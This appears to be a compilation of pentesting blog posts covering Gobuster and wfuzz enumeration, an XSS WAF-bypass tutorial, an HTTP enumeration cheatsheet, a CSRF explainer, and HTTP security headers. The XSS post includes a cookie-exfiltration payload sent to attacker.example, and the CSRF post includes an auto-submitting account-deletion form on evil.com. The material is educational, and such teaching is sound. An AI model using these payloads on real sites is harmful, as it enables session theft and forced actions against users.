Tips & Tricks

Dealing w/ Gobuster “WildCard” and “Status Code” Errors

Have you ever encountered the following error within Gobuster?

Error: the server returns a status code that matches the provided options for non existing urls. http://ipaddress/9b9353c0-3de2-4df5-abd7-0f618e4d70ab => 200. To force processing of Wildcard responses, specify the '--wildcard' switch

Most likely, the webserver you're attacking is configured to always respond with a 200 response code. For example, let's look at Bart on Hack The Box.

Let’s see if we can extract anything with Curl. We’ll start by sending a request out to the default page. We see that it returns a 302 redirect to forum.bart.htb.

curl -vvv 10.10.10.81

Next, let's try a request to a page we know doesn't exist. We're still returned a 200 success response that displays an image, which explains why Gobuster was reporting a 200 for every directory.
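For example, a request like the following (the path here is just an arbitrary string that shouldn't exist) still comes back with a 200:

curl -vvv 10.10.10.81/thispagedoesnotexist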

We can confirm this by browsing to the page and looking at the image.

Armed with this information, we know that 200 response codes are false positives here, but other response codes (such as a 302) indicate a directory is actually present. Let's rerun our Gobuster command, but this time we'll specify which response codes we want returned.

Checking the help page, we can see that Gobuster's default set of positive response codes is "200,204,301,302,307,401,403".

So our command will look like this.

gobuster dir -u http://10.10.10.81 -w /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt -s "204,301,302,307,401,403"

And with that command running, we eventually start to get some real results back.

Hacking Tutorial

Bruteforcing Subdomains w/ WFuzz

This guide is going to use CMess from TryHackMe as an example, but it does not intend to serve as a walkthrough or write-up of the machine.


Before we begin, make sure you can resolve the domain name that we’re targeting. If you’re doing this in a CTF-type environment, you may need to update your /etc/hosts file with the hostname/address of the target.
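For example, appending an entry like the following will let your tools resolve the hostname (the IP address shown is just a placeholder for your target's actual address):

echo "10.10.123.45 cmess.thm" | sudo tee -a /etc/hosts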

We can use a tool called wfuzz to bruteforce a list of subdomains, but first, we’ll need a list to use.

I like to use the top 5000 list from SecLists, which can be found at https://github.com/danielmiessler/SecLists/blob/master/Discovery/DNS/subdomains-top1million-5000.txt

With our list in hand, let's set up our command. We'll use the -f flag to log results to a file (named sub-fighter.txt here) and place wfuzz's FUZZ keyword in the Host header so that each subdomain from the wordlist gets substituted in.

wfuzz -c -f sub-fighter.txt -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u 'http://<targetURL>' -H "Host: FUZZ.<targetURL>" --sc 200,202,204,301,302,307,403

Depending on how the site is configured, you may get a ton of output that appears to show valid subdomains. If you notice a large number of results that all share the same word count, that's often a sign the site returns a 200 response for everything but simply displays a "Not found" page.

To remove results with a specific word count, you can append --hw <value> to your command. For example, our new command that removes results that respond w/ a word count of 290 would look like the following:

wfuzz -c -f sub-fighter.txt -w top5000.txt -u 'http://target.tld' -H "Host: FUZZ.target.tld" --hw 290

This will return a list of subdomains whose responses do not have a word count of 290. If you get a successful result, make sure you're able to resolve the subdomain as well before trying to browse to it. If you're in a CTF-type environment, you may need to update your /etc/hosts file.

With our /etc/hosts file updated, we should be able to browse to the page.

Hacking Tutorial, Pentesting, WebApp 101

Bypassing XSS Defenses Part 1: Finding Allowed Tags and Attributes

This post intends to serve as a guide for a common bypass technique when you’re up against a web application firewall (WAF). In the event that the WAF limits what tags and attributes are allowed to be passed, we can use BurpSuite’s Intruder functionality to learn which tags are allowed.

Table of Contents:

  • Setting the stage.
  • Identifying which tags are allowed.
  • Identifying which events are allowed.
  • Putting the pieces together.

Setting the stage.

In our example, we have a webapp with a vulnerable search field. To begin testing, we start out with a simple XSS payload that will display the session cookie of the user when it fails to load a bad image path.

<img src=1 onerror=alert(document.cookie)>

However, the webserver responds with an error stating we’re using a tag that isn’t allowed.


Identifying which tags are allowed.

If we're going to exploit this webapp, we need to first find out what tags are allowed in the search field. To do this, we can leverage BurpSuite's Intruder functionality to brute force the page with a list of every HTML tag and see which one(s) respond with a success message.

Let’s spin up BurpSuite and capture a web request with a generic search term.

With our request captured, let’s send this off to Intruder.

To begin, let's click Clear to remove the default payload positions BurpSuite selected for us.

Now we will replace the search term with <> to open/close the script tags that we wish to send to the application. Place the cursor between the angle brackets and click Add § twice, to create a payload position. The value of the search term should now look like: <§§>

Now that we have the position set, we need to provide our list of payloads. Head over to PortSwigger’s XSS cheat sheet and click Copy tags to clipboard.

With a list of all tags copied to your clipboard, head back to Intruder and select the Payload tab. Then click Paste.

Everything should now be in place! Let’s click Start Attack and allow time for all of the requests to be made.

Once the attack finishes, we see that the body tag returns a status code of 200. This indicates that the WAF allows this tag, and perhaps we can use it in our exploitation process.


Identifying which events are allowed.

Now that we know we can use the body tag, we need to know which events we can use. We'll repeat the same process we used above, but this time, we'll Copy events to clipboard from PortSwigger's XSS cheat sheet.

Heading back to Intruder, we’ll start by adjusting our list of Payloads. Click Clear to remove the existing list.

Now we can Paste our list of events.

Let’s head over to the Positions tab and adjust our search term to <body%20=1>. Place your cursor before the equal sign and then click Add § twice to create the payload position. The value of the search term should now look like: <body%20§§=1>

This will cause BurpSuite to send requests to the search field that look like

/?search=<body onactivate=1>
/?search=<body onafterprint=1>
/?search=<body onafterscriptexecute=1>

I’m happy with that. We’ll Start Attack.

Observe the results, and notice that the only payload returning a 200 response is onresize.


Putting the pieces together.

So what do we know? Well, we know that we can use the body tag along with the onresize event. Armed with this knowledge, what would happen if we were to inject JavaScript code that displayed the user's session cookie when the window is resized? Could we craft something that automatically resizes the window to trigger this for us?

As an attacker, let's spin up a malicious webpage that includes a reference to the vulnerable webapp within an iframe.

<iframe src="https://your-lab-id.web-security-academy.net/?search="><body onresize=alert(document.cookie)>" onload=this.style.width='100px'>

Let’s break down what we’re doing.

  1. We begin by inserting an iframe to our webpage that will display content from the vulnerable webapp.
  2. We then inject a search query that will generate an alert containing the victim's session cookie when the onresize event fires on the body tag.
  3. We then force the iframe to resize itself to a width of 100px upon loading.
  4. When the victim browses to our malicious website, this iframe will be loaded in their browser, resized, and then the session cookie will be displayed back to them.

Now, this is really just useful as a proof of concept, because this particular example displays the cookie to the victim rather than providing it to the attacker. The finished product would look something like this after including HTML encoding.

<iframe src="https://your-lab-id.web-security-academy.net/?search=%22%3E%3Cbody%20onresize=alert(document.cookie)%3E" onload=this.style.width='100px'>
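If you wanted to actually capture the cookie in a real attack, one option is to swap the alert for a redirect to a server you control. A hedged sketch of the injected payload (attacker.example is a placeholder for your own listener):

"><body onresize=document.location='https://attacker.example/?c='+document.cookie>

You'd still URL-encode this the same way before dropping it into the iframe's src attribute.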


The primary goal for this post was to showcase BurpSuite Intruder’s ability to bruteforce a webserver and identify the attack surface. I hope you found it useful!

Enumeration Cheatsheets

Enumerating HTTP Ports (80, 443, 8080, etc.)


When enumerating, we want to be able to identify the software/versions that are fulfilling the following roles. This document intends to serve as a guide for hunting for the answers.

  • Web Application – WordPress, CMS, Drupal, etc.
  • Web Technologies – Node.js, PHP, Java, etc.
  • Web Server – Apache, IIS, Nginx, etc.
  • Database – MySQL, MariaDB, PostgreSQL, etc.
  • OS – Ubuntu Linux, Windows Server, etc.

Using Curl

Pulling out internal/external links from source code.
curl <address> -s -L | grep "title\|href" | sed -e 's/^[[:space:]]*//'

To view just HTTP Links:
curl -s <address> | grep -Eo '(href|src)=".*"' | sed -r 's/(href|src)=//g' | tr -d '"' | sort

Strip the HTML code from the source code of a webpage.
curl <address> -s -L | html2text -width '99' | uniq

Check for contents of robots.txt.
curl <address>/robots.txt -s | html2text
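
Check the response headers for software/version details (the Server and X-Powered-By headers often leak this).
curl <address> -s -I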


Using Nikto

To perform a scan.
sudo nikto -host=http://<address>/


Using Gobuster

First, let's start with an initial scan of the address using a default wordlist. We'll have it return results for most response codes.

For invalid HTTPS certificates, you can include -k to any of these commands to bypass cert checks.

gobuster dir -u http://<address>/ -w /usr/share/seclists/Discovery/Web-Content/common.txt -s '200,204,301,302,307,403,500' -e -x txt,php,html

After the common.txt scan finishes, I like to use the following to dig deeper.

gobuster dir -u http://<address>/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -s '200,204,301,302,307,403,500' -e -x txt,html,php,asp

We can also leverage the following wordlist to look for CGI URLs.

gobuster dir -u http://<address>/ -w /usr/share/dirb/wordlists/vulns/cgis.txt -s '200,204,301,302,307,403,500' -e

Note: If you start getting spammed with a particular response code, you can remove that from the -s flag.

If you find a cgi-bin directory, you may want to consider scanning it for .sh files. If one is found, see if the machine is vulnerable to Shellshock. There is an nmap script that can identify the vulnerability, but it isn't always reliable, so it may be beneficial to run the request through a tool like Burp and inspect it manually.
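As a hedged example, an invocation of nmap's http-shellshock script might look like this (the uri value is a placeholder for whatever script you actually found):

sudo nmap -sV -p 80 --script http-shellshock --script-args uri=/cgi-bin/test.sh <address>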


Using Dirsearch

This is a tool you can get from GitHub. It provides much of the same functionality as Gobuster.

The following syntax will run the tool to enumerate php and html files. It will exclude responses w/ code 400, 401, and 403.

python3 dirsearch.py -u http://url.tld -e php,html -x 400,401,403


Using WFuzz

Subdomain Enumeration. Check out the post I made on this topic over at https://infinitelogins.com/2020/09/02/bruteforcing-subdomains-wfuzz/

Valid User Enumeration. Check out the post I made on this topic over at https://infinitelogins.com/2020/09/07/bruteforcing-usernames-w-wfuzz/

Enumerating valid parameters in URLs. You can run the following command to try and brute-force valid parameter names.
wfuzz -u http://<address>/?FUZZ=index -w /usr/share/seclists/Discovery/Web-Content/common.txt


Enumeration Checklist

Once you feel you’ve enumerated everything, just check your work against this list to make sure you’re not missing anything.

  • Did you brute force directories?
    • Did your brute force search recursively?
    • Did your brute force include file extensions?
    • Is your brute force case-sensitive?

  • Did you enumerate the hostname of the box and update your /etc/hosts file to include it?
    • Did you enumerate subdomains?
    • Did you brute force directories when browsing to it via hostname?

  • Did you review every webpage on the box for clues?
    • Did you review the source code?
    • Are there usernames hidden anywhere?
    • Are there specific version details provided?

  • Did you check for vulnerable technologies?
    • If you’re able to enumerate version information, did you searchsploit and/or research for public exploits?
    • What about for PHP or ASP?
    • What about for WordPress or Drupal?
    • What about for Apache or IIS?
    • Can you use a specific tool like WPSCAN to enumerate further?

  • Did you find a login page?
    • Can you enumerate multiple users on it?
    • Can you brute-force it?
    • Can you perform an injection attack (SQL, XSS, etc.)?
  • If there is HTTPS on the page, did you check the certificate for details?
    • Does the cert contain specific email addresses?
    • Does the cert contain information about a hostname of the box?
    • Is the cert valid on other domain-names?

  • Are there other ports running HTTP or HTTPS that you need to repeat all of this on?

General Blog

Let’s Talk Basics About Cross Site Request Forgery (CSRF)

It became apparent to me that my understanding of CSRF was lacking, or uh, basically non-existent. This post aims to fix that! Come learn about it along with me.

Note: This particular post is NOT a hacking tutorial on abusing CSRF, though I’m sure I will post one in the near future (make sure to subscribe or hit up my Twitter feed so you’ll know when that comes out).


What is Cross Site Request Forgery?

Well, we know that it has historically appeared in the OWASP Top 10 for web application vulnerabilities, but what does it actually do?

CSRF is when another website is able to make a request, as a victim user, to the target website. What does that mean? Well, it means that an attacker may trick the users of a web application into performing unwanted tasks, such as transferring funds, changing their email address, deleting their account, posting a comment, etc.

Let's say there is a web application running on vulnerable.com (please don't try to actually visit this site, I have no idea what is there and whether or not it's a valid webpage). In our fake scenario, vulnerable.com hosts a simple web application where you can create an account and post a comment on a text board. There is also a page for you to delete your account. Normally, if an end-user wanted to actually delete their account, they would browse to this page, click the confirmation button, and then a request would be made to the webserver that looks something like this:

POST /delete_my_account HTTP/1.1
Host: vulnerable.com
Content-Type: application/x-www-form-urlencoded
Cookie: SessionID=d42be1j5

delete=1

The key items to note here are that this is a POST request to vulnerable.com/delete_my_account tied to a specific SessionID. Now, in a perfect world, the only person who would initiate this request would be the actual end-user behind that SessionID, but what if we — evil hackers — wanted to delete the account for them without their consent?

This is where CSRF comes in. Let's, as attackers, spin up a malicious webpage at evil.com (same disclaimer as before) and add code so that we initiate that same request mentioned above once a user accesses our webpage. If vulnerable.com doesn't have protections in place, we could leverage CSRF to send the same POST request and delete user accounts on a completely separate website without the user's consent.
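To make that concrete, here's a minimal sketch of what the code on evil.com could look like, assuming vulnerable.com has no CSRF protections in place and the victim is still logged in (so their browser attaches the session cookie automatically):

<!-- Auto-submit a cross-site POST to vulnerable.com the moment the page loads -->
<form action="https://vulnerable.com/delete_my_account" method="POST">
  <input type="hidden" name="delete" value="1">
</form>
<script>document.forms[0].submit();</script>

When the victim lands on evil.com, their browser fires off the same POST shown above, cookie and all, and the account gets deleted.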


So how do we mitigate this?

There are a number of mitigation techniques.

Add a hash (session ID, function name, server-side secret) to all forms.
This method involves including a random, unique identifier in webforms when a user accesses the page. The idea behind this technique is that an attacker's webserver cannot possibly know what unique identifier is being used for the victim user on the target website. This means that even if they attempt a CSRF attack, the target website will notice that the unique identifier is missing and reject the POST request.
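For example, a protected version of the delete form might embed a per-session token as a hidden field (the field name and token value below are purely illustrative):

<form action="/delete_my_account" method="POST">
  <!-- Random per-session value the attacker's site has no way of knowing -->
  <input type="hidden" name="csrf_token" value="e83b60f27db4a1c9">
  <input type="submit" value="Delete my account">
</form>

The server then rejects any POST that arrives without the matching token.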

Checking the Referer header in the client's HTTP request.
When a web request is submitted, there is typically a Referer header (that's the spelling the HTTP specification uses) that specifies where the request originated. Ensuring that the request came from the original site means that requests forged from other sites will not function.

Note: This method may not always be reliable for web developers, because if the user utilizes an ad-blocker or additional privacy protection methods, the Referer header on a valid web request may indicate the request came from one of these third parties.

Signing out of webapps when not in use.
While CSRF is really a problem with the web application, and not the end user utilizing the webpage, users can protect themselves by signing out or killing any active sessions for their sensitive webapps BEFORE browsing the web or accessing a different page.

General Blog

Have a WebApp? Here Are Three HTTP Headers Leaking Your Server Information

This post intends to discuss the three most common HTTP headers that leak server information. While these headers don’t do anything to help protect against attacks, they can be used by attackers to enumerate the underlying technologies behind the application during the early enumeration phase of an attack.

If you’d like to learn more about HTTP headers that can help mitigate a range of attack vectors, check out my previous post What are Web Application HTTP Security Headers? When do you use them?


SERVER

What does this header do?
This header contains information about the software used by the back-end server (type and version).

EXAMPLE:

We’re able to identify that this webserver is running IIS 8.5 based on the Server header.
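The relevant line of the response might look like this (version value illustrative):

Server: Microsoft-IIS/8.5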


X-POWERED-BY

What does this header do?
It contains the details of the web framework or programming language used in the web application. 

EXAMPLE:

We're able to identify exactly what PHP version is being used on this webserver by its X-Powered-By header.
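For instance (version value illustrative):

X-Powered-By: PHP/5.6.40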


X-ASPNET-VERSION

What does this header do?
As the name suggests, it shows the version details of the ASP.NET framework. This information may help an adversary fine-tune their attack based on the framework and its version.

EXAMPLE:

We're able to identify exactly what ASP.NET version is running on this webserver based on the X-AspNet-Version header.
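For instance (version value illustrative):

X-AspNet-Version: 4.0.30319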


Why do we care? What can we do about it?

Why is this dangerous?
Because these headers leak software information, an attacker knows exactly what web technologies are in place and what their associated version(s) are. Armed with this information, they can hunt for publicly known exploits against those versions.

What is your recommendation?
The server information can be masked by reconfiguring the webserver to report something other than the actual server technologies in place.
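As a hedged sketch for a couple of common platforms (these directives are real, but check your own server's documentation for the exact options):

# Apache httpd.conf -- report only "Apache" in the Server header
ServerTokens Prod
ServerSignature Off

; php.ini -- stop PHP from emitting the X-Powered-By header
expose_php = Off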

General Blog

What are Web Application HTTP Security Headers? When do you use them?

This post intends to serve as a guide for some of the most common HTTP Headers web applications use to prevent exploitation of potential vulnerabilities. Within this article, you will discover the name of the various headers, along with their use case and various configuration options.

If you’d like to learn more about which headers may be leaking information about the software running on your webserver, check out my other post titled Have a WebApp? Here Are Three HTTP Headers Leaking Your Server Information.

Table of Contents:

  • Strict-Transport-Security
  • Content-Security-Policy
  • Access-Control-Allow-Origin
  • Set-Cookie
  • X-Frame-Options
  • X-XSS-Protection
  • Additional Resources

STRICT-TRANSPORT-SECURITY

What does this header do?
HTTP Strict Transport Security instructs the browser to access the webserver over HTTPS only.

Why would we use this?
By enforcing the use of HTTPS, we're ensuring that users accessing the web page have a secure, encrypted connection. This can also help users notice whether they are victims of man-in-the-middle attacks, since they'll receive certificate errors even though a valid certificate is in place on the webpage.

What values can we set this header to?
There are 3 directives for this header:

  • Max-Age : Commonly set to 31536000 (one year). This is the maximum age (time) for which the header is valid. The server refreshes this time with every new response to prevent it from expiring.
  • IncludeSubDomains : This applies control over subdomains of the website as well.
  • Preload : This is a list maintained by Google. Websites on this list will automatically have HTTPS enforced in the Google Chrome browser.
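Putting those directives together, a typical response header looks like this:

Strict-Transport-Security: max-age=31536000; includeSubDomains; preload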

CONTENT-SECURITY-POLICY

What does this header do?
Content Security Policy is used to instruct the browser to load only the allowed content defined in the policy. This uses a whitelisting approach which tells the browser from where to load the images, scripts, CSS, applets, etc.

Why would we use this?
If implemented properly, we would be able to prevent exploitation of Cross-Site Scripting (XSS), Clickjacking, and HTML Injection attacks. We do this by carefully specifying where content can be loaded from, which hopefully isn’t a location that attackers have control of.

What values can we set this header to?
The values can be defined with the following directives:

  • default-src
  • script-src
  • media-src
  • img-src
EXAMPLE:

Content-Security-Policy: default-src 'self'; script-src runscript.com; media-src online123.com online321.com; img-src *;

This would be interpreted by the browser as:

  • default-src 'self' : Load everything from the current domain.
  • script-src runscript.com : Scripts can only be loaded from runscript.com
  • media-src online123.com online321.com : Media can only be loaded from online123.com and online321.com.
  • img-src * : Images can be loaded from anywhere.

ACCESS-CONTROL-ALLOW-ORIGIN

What does this header do?
This header indicates whether the response can be shared with requesting code from the given origin.

Why would we use this?
This is used to take a whitelisting approach on which third parties are allowed to access a given resource. For example, if site ABC wants to access a resource on site XYZ (and is allowed to), XYZ will respond with an Access-Control-Allow-Origin header containing the address of site ABC to instruct the browser that this is allowed.

What values can we set this header to?
The following directives can be used:

  • * : For requests without credentials, you can specify a wildcard to tell browsers to allow requesting code from any origin to access the resource.
  • <origin> : Specifies a single origin.
  • null : This should not be used.
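For example, to allow only site ABC from the scenario above to read the response (domain illustrative):

Access-Control-Allow-Origin: https://abc.example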

SET-COOKIE

What does this header do?
This response header is used to send cookies from the server to the user agent, so the user agent can send them back to the server later. One important use of cookies is tracking a user session, and session cookies can oftentimes contain sensitive information. Because of this, there are additional attributes that we can set to secure the cookies.

Why would we use the additional attributes?
Using these additional attributes can help protect the cookies against unauthorized access.

What values can we apply?
While there are many attributes for a cookie, the following are most important from a security perspective.

  • Secure : A cookie set with this attribute will only be sent over HTTPS and not over the clear-text HTTP protocol (which is susceptible to eavesdropping).
  • HTTPOnly : The browser will not permit JavaScript code to access the contents of the cookies set with this attribute. This helps in mitigating session hijacking through cross-site scripting (XSS) attacks.
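Combining both attributes with the session cookie from earlier, the header would look like this (cookie value illustrative):

Set-Cookie: SessionID=d42be1j5; Secure; HttpOnly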

X-FRAME-OPTIONS

What does this header do?
This header can be used to indicate whether or not a browser should be allowed to render a page in a <frame>, <iframe> or <object>.

Why would we use this?
Use this to avoid clickjacking attacks. Without clickjacking protections, an adversary could trick a user into accessing a malicious website that loads the target application into an invisible iframe. When the user clicks on the malicious application (e.g. a web-based game), the clicks are 'stolen' and sent to the target application instead. As a result, the user clicks on the legitimate application without their consent, which could result in unwanted actions being performed (e.g. deleting an account).

What values can we set this header to?
There are 3 directives we can use:

  • DENY : This will not allow the page to be loaded in a frame on any website.
  • SAMEORIGIN : This will allow the page to be loaded in a frame only if the framing page is from the same origin.
  • ALLOW-FROM uri : The page can only be displayed in a frame on the specified domain/origin. (Note that this directive is deprecated in modern browsers.)
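For example, to permit framing only by pages from the same origin:

X-Frame-Options: SAMEORIGIN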

X-XSS-PROTECTION

What does this header do?
This header enables the cross-site scripting (XSS) filter built into some web browsers. (Note that many modern browsers have since removed this filter.)

Why would we use this?
The sole purpose is to protect against Cross-Site Scripting (XSS) attacks.

What values can we set this header to?
There are 3 modes that we can set this header to:

  • 0; : Disables the XSS filter.
  • 1; : Enables the filter. If an attack is detected, the browser will sanitize the content of the page in order to block the script execution.
  • 1; mode=block : Will prevent the rendering of the page if an XSS attack is detected.
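For example, the most common hardened setting:

X-XSS-Protection: 1; mode=block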

Additional Resources

This is nowhere near an exhaustive list of the different security headers that you should be using. If you'd like to learn more or dive deeper into this topic, I'd recommend checking out the following websites:

Essential HTTP Headers for Securing Your Web Server

Mozilla’s HTTP Headers Documentation